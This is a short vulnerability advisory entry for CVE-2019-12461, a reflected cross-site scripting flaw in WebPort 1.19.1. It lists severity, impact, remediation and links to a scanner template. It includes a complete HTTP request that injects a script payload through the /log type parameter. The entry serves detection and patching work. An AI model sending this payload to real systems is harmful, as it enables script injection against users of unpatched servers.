| Title | WebPort 1.19.1 - Cross-Site Scripting |
|---|---|
| Author | pikpikcu |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to the latest version of WebPort (1.19.2 or higher) which includes a fix for this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.55026 |
| CVE ID | CVE-2019-12461 |
| CWE ID | CWE-79 |
| Tags | cve cve2019 xss webport vuln |
Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.
GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-12461.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-12461.pcap
N/AN/A